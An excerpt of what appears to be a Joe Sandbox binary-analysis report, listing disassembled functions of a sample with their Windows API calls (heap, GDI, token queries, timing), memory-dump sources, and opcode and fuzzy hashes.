                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDCE0F
                                                                      • _free.LIBCMT ref: 00BDCE22
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDCE31
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: de9278ed738f354bfe05d64ff6b7ef77468285276b1df1b2b0f5882f050a89cd
                                                                      • Instruction ID: 27f3177a66fd9e799ed9ddb0dda608ee6574f05873afc2a241b42ec464f1b9ae
                                                                      • Opcode Fuzzy Hash: de9278ed738f354bfe05d64ff6b7ef77468285276b1df1b2b0f5882f050a89cd
                                                                      • Instruction Fuzzy Hash: 3A01B5B26012167F23211ABA6C88E7FFEADDEC6BA1315016AF905D7301FA619D01D2B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BB9693
                                                                      • SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                                      • BeginPath.GDI32(?), ref: 00BB96B9
                                                                      • SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 6b46ee5ee8e38814b88625446d4ea171b6f2bff35baf009191c9e21978c3f8f8
                                                                      • Instruction ID: 79a5842555607972d20fb686da37b4763602837cc317032b5fa0776980fc0ad6
                                                                      • Opcode Fuzzy Hash: 6b46ee5ee8e38814b88625446d4ea171b6f2bff35baf009191c9e21978c3f8f8
                                                                      • Instruction Fuzzy Hash: D2217C31812305EBDB119F28EC59BFD7BF8FB10315F180256FA19A61B0D3B09896DB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C05711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: ce82fda6f981ff65146a8f478946912645547da6cf10faaafbac1ef3c25bdec6
                                                                      • Instruction ID: b3f04decee49c8a37f3660d3292017046e196b6526a660b5b77cc674082de1dc
                                                                      • Opcode Fuzzy Hash: ce82fda6f981ff65146a8f478946912645547da6cf10faaafbac1ef3c25bdec6
                                                                      • Instruction Fuzzy Hash: 2C01F9A1695605BBD71855199E42FBB738CDF61398F000438FD14AA2C2F720EE11DAE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6), ref: 00BD2DFD
                                                                      • _free.LIBCMT ref: 00BD2E32
                                                                      • _free.LIBCMT ref: 00BD2E59
                                                                      • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E66
                                                                      • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 76a35a4cd32fde40ccf6062935efb441687299d1d2a52b4005dc2c8cdc7f5d66
                                                                      • Instruction ID: 042d7b2b7b8e18d2e284a600ca7482dec5145e2e50dbcb03aa9a4cdc2bacd276
                                                                      • Opcode Fuzzy Hash: 76a35a4cd32fde40ccf6062935efb441687299d1d2a52b4005dc2c8cdc7f5d66
                                                                      • Instruction Fuzzy Hash: 1801F9365056806BC61227356CC5F6FA7D9EBF17B272444B7F425A3392FB74CC014120
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32 ref: 00C0002B
                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C00046
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C00064
                                                                      • CLSIDFromString.OLE32(?,?), ref: 00C00070
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c780d680302ca2512a2812fa8c934e8018d2926427f675b5525b185b1dcaaf66
                                                                      • Instruction ID: a53521d93af85659b281bd688bc4a33c02a9066162d4fc69551b547d209c459a
                                                                      • Opcode Fuzzy Hash: c780d680302ca2512a2812fa8c934e8018d2926427f675b5525b185b1dcaaf66
                                                                      • Instruction Fuzzy Hash: 44018F76610204BFDB104F69DC48BAE7BADEB44756F254124F905E2290DB75DE40CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E997
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00C0E9A5
                                                                      • Sleep.KERNEL32(00000000), ref: 00C0E9AD
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E9B7
                                                                      • Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 347f721c921abe24ec5d61d4173399e29454f26c62a1a93b8e60db7e03e04bf7
                                                                      • Instruction ID: 79d3bf0edfff08f95ec5d81f1c48db9c898ad40eaa4d71e67e1223a654f8ecfc
                                                                      • Opcode Fuzzy Hash: 347f721c921abe24ec5d61d4173399e29454f26c62a1a93b8e60db7e03e04bf7
                                                                      • Instruction Fuzzy Hash: 19011331C41639DBCF00ABE5D999BEEBB78BB09701F000956E912B2291CB309695DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 2aa60dfb7cd5619118decad54cf6b514dd4c29d1802a28982143cf1dacace830
                                                                      • Instruction ID: 4ab7c2d21e9c093c37e2c04b44c92b20f66d79885ad9f59bfa6486a756c775a6
                                                                      • Opcode Fuzzy Hash: 2aa60dfb7cd5619118decad54cf6b514dd4c29d1802a28982143cf1dacace830
                                                                      • Instruction Fuzzy Hash: 7D016975200205BFDB154FA4DC89BAE3B6EEF8A3A0B240418FE41E33A0DA31DD00DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C00FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 6ef08b5b95c7e850cbbb85c9548eae0e2745691d55a6557d7cca472914b91c1d
                                                                      • Instruction ID: 6fc16de846e03cde805c7c5a4a20f5683438ed6d7b7a1aa3142b41a0722f0488
                                                                      • Opcode Fuzzy Hash: 6ef08b5b95c7e850cbbb85c9548eae0e2745691d55a6557d7cca472914b91c1d
                                                                      • Instruction Fuzzy Hash: BFF04935210301AFDB224FA49C89F5E3BADEF89762F144414FA85E7291CA70DC50CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                                      • Instruction ID: 9bb10c7243aa512d7de0f6b5393400eb2cb7044eabc53ec91412224ff92d7d7b
                                                                      • Opcode Fuzzy Hash: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                                      • Instruction Fuzzy Hash: 3AF06D35210301EBDB215FA4EC89F5E3BADEF89761F140414FE85E7290CA70D950CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                                      • Instruction ID: f2a79699114a262bed80875c0be496ad8c38537cbfa9bedad09905795aea1d84
                                                                      • Opcode Fuzzy Hash: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                                      • Instruction Fuzzy Hash: 5501A272800B15DFC730AF66D880456F7F5BF513153658A3FD1A652931C3B1AA95EF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BDD752
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDD764
                                                                      • _free.LIBCMT ref: 00BDD776
                                                                      • _free.LIBCMT ref: 00BDD788
                                                                      • _free.LIBCMT ref: 00BDD79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 7640e5ac60de64e8c1a254cb9a882e6ea12612b4513675199d9a27bd2f643491
                                                                      • Instruction ID: dd583b9f85c91b76bf32cb8d2907a0944346ba99ca78630409c3dca1873b800e
                                                                      • Opcode Fuzzy Hash: 7640e5ac60de64e8c1a254cb9a882e6ea12612b4513675199d9a27bd2f643491
                                                                      • Instruction Fuzzy Hash: 77F04F32544244ABC635EB65F9C1E2ABBDDFB44310B940897F098D7741EB24FC808A64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BD22BE
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BD22D0
                                                                      • _free.LIBCMT ref: 00BD22E3
                                                                      • _free.LIBCMT ref: 00BD22F4
                                                                      • _free.LIBCMT ref: 00BD2305
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: ea4cac18b4af99d88ecabb49f0680448b30573b4955ba56358e9274bca22eb06
                                                                      • Instruction ID: 0e4b081c8ef25af41eef942c1a70146cf6975911b0f2204ca6aa2e6cb58a3a3d
                                                                      • Opcode Fuzzy Hash: ea4cac18b4af99d88ecabb49f0680448b30573b4955ba56358e9274bca22eb06
                                                                      • Instruction Fuzzy Hash: 57F030784001908B8722AFA8BC51B1C7BA8F72C7507140597F418D73B2DB740491BBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                                      • Instruction ID: 89480a73a4c13bc06dd36ec5117fd12057a963acf62198fe68937e1a705efd8a
                                                                      • Opcode Fuzzy Hash: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                                      • Instruction Fuzzy Hash: E8F0EC31015744EBDB265F69ED5C7BC3FA5EB11322F088254FA6A650F0C7748996DF20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: 65cec1ac7b2ccc76cf53d8982f6f3580768245f2e74c8d85e28144f738648a86
                                                                      • Instruction ID: 8063c240f2e7b9307d505d88005285abffa36cd08963edfe08d026a61576d4e0
                                                                      • Opcode Fuzzy Hash: 65cec1ac7b2ccc76cf53d8982f6f3580768245f2e74c8d85e28144f738648a86
                                                                      • Instruction Fuzzy Hash: 23D1E131900206BADB289F6CC895BBAF7F1EF05710F24499BE505AB751F3359D80CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C27B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
